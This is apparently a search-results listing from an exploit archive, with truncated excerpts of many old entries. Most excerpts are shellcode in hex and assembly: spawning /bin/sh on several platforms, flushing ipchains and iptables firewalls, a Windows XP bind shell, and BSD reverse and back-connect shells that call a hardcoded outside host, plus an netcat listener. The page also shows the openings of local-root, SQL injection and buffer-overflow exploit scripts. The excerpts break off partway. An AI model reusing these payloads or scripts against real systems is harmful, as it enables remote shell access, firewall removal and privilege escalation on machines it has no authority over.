2058 matches found
linux/x86 ipchains -F 49 bytes
No description provided by source. #include <stdio.h> #include <string.h> / asm" sub $0x4,%esp With this we make sure the shellcode never popl %esp overwrites itself... thanks RaiSe : xorl %edx,%edx %edx to zero pushl %edx and we put the zeros at the end of the string in memory pushw $0x462d we have -F0000...
linux/x86 ipchains -F 49 bytes
linux/x86 ipchains -F 49 bytes. Shellcode exploit for linux/x86 platform include include / asm" sub $0x4,%esp With this we make sure the shellcode never popl %esp overwrites itself... thanks RaiSe : xorl %edx,%edx %edx to zero pushl %edx and we put the zeros at the end of the string in memory pushw $0x46...
os-x/PPC create /tmp/suid 122 bytes
Exploit for os-x/ppc platform in category shellcode =================================== os-x/PPC create /tmp/suid 122 bytes =================================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode =...
freebsd/x86 execve /bin/sh 37 bytes
Exploit for freebsd/x86 platform in category shellcode =================================== freebsd/x86 execve /bin/sh 37 bytes =================================== / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator...
linux/x86 xterm -ut -display [IP]:0 132 bytes
Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 xterm -ut -display IP:0 132 bytes ============================================= / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change ...
HPUX execve /bin/sh 58 bytes
No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...
linux/x86 - iptables -F 58 bytes
linux/x86 iptables -F 58 bytes. Shellcode exploit for linux/x86 platform / The shellcode flushes the iptables by running /sbin/iptables -F no exit greetz to zilion: man, my code is shorter! size = 58 bytes OS = Linux i386 written by /rootteam/dev0id www.sysworld.net BITS 32 jmp short callme main: pop...
solaris/x86 execve /bin/sh toupper evasion 84 bytes
solaris/x86 execve /bin/sh toupper evasion 84 bytes. Shellcode exploit for solaris/x86 platform / Solaris/x86 Used for toupper evasion look to the linux version for an explanation and usage example. / char c0de = / main: / "\xeb\x33" / jmp callz / / start: / "\x5e" / popl %esi / "\x8d\x06" / leal...
windows/XP-sp1 portshell on port 58821 116 bytes
windows/XP-sp1 portshell on port 58821 116 bytes. Shellcode exploit for win32 platform / 116 bytes bindcode hardcoded for Windows XP SP1 / / but you can change the address if you want / / i made it pretty clear where they are / / the bindcode will bind to port 58821 / / by silicon /...
bsd/x86 reverse portbind 129 bytes
Exploit for bsd/x86 platform in category shellcode ================================== bsd/x86 reverse portbind 129 bytes ================================== / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on...
bsd/x86 connect 93 bytes
No description provided by source. / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: pop esi xor eax,eax mov byte...
GNU Sharutils <= 4.2.1 Local Format String PoC Exploit
No description provided by source. / GNU sharutils <= 4.2.1 Local Format String POC Code C0ded by n4rk0tix a.k.a nrktx [email protected] Below is a l4m3 proof of concept code for da recently reported lame bug; These binaryz have not only format bugz, but also buffer overflowz,etc.We also...
CDRecord's ReadCD Local Root Privileges
Exploit for linux platform in category local exploits ======================================= CDRecord's ReadCD Local Root Privileges ======================================= #!/bin/bash echo "readcd-exp.sh -- ReadCD local exploit Test on cdrecord-2.01-0.a27.2mdk" echo "Author : newbug at chroot.or...
PHP-Nuke SQL Injection Edit/Save Message(s) Bug
Exploit for unknown platform in category web applications =============================================== PHP-Nuke SQL Injection Edit/Save Messages Bug =============================================== #!/usr/bin/perl use LWP; $log = "poskomenphpnukesavemsg.txt"; $Agent = "Mbahmubangga/1.0"; $proxy ...
htpasswd Apache 1.3.31 - Local Overflow
#!/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"...
adv17.txt
+| Advisory 17. Search Engine & Directory by Turbo Seek Software: Search Engine & Directory Powered by Turbo Seek Vendor: FocalMedia.Net http://www.focalmedia.net Vulnerability: ability to read files Risk: medium Date: 10'Sept 2004 discovered by durito -duritoatmaildotru- HTTP: www.lwb57.org...
Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service
source: https://www.securityfocus.com/bid/11161/info Pingtel Xpressa handsets are reported prone to a remote denial of service vulnerability. The issue is reported to exist because of a lack of sufficient boundary checks performed on HTTP request data handled by the Xpressa administration web...
linux/x86 execve /bin/sh xor encrypted 55 bytes
linux/x86 execve /bin/sh xor encrypted 55 bytes. Shellcode exploit for linux/x86 platform / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl...
linux/x86 execve /bin/sh xor encrypted 55 bytes
No description provided by source. / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl %ebx,0x8%esp movl %edx,0xc%esp movb $0xb,%al leal 0x8%esp,%e...
linux/x86 bsd/x86 execve /bin/sh 38 bytes
Exploit for multiple platform in category shellcode ========================================= linux/x86 bsd/x86 execve /bin/sh 38 bytes ========================================= / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68"...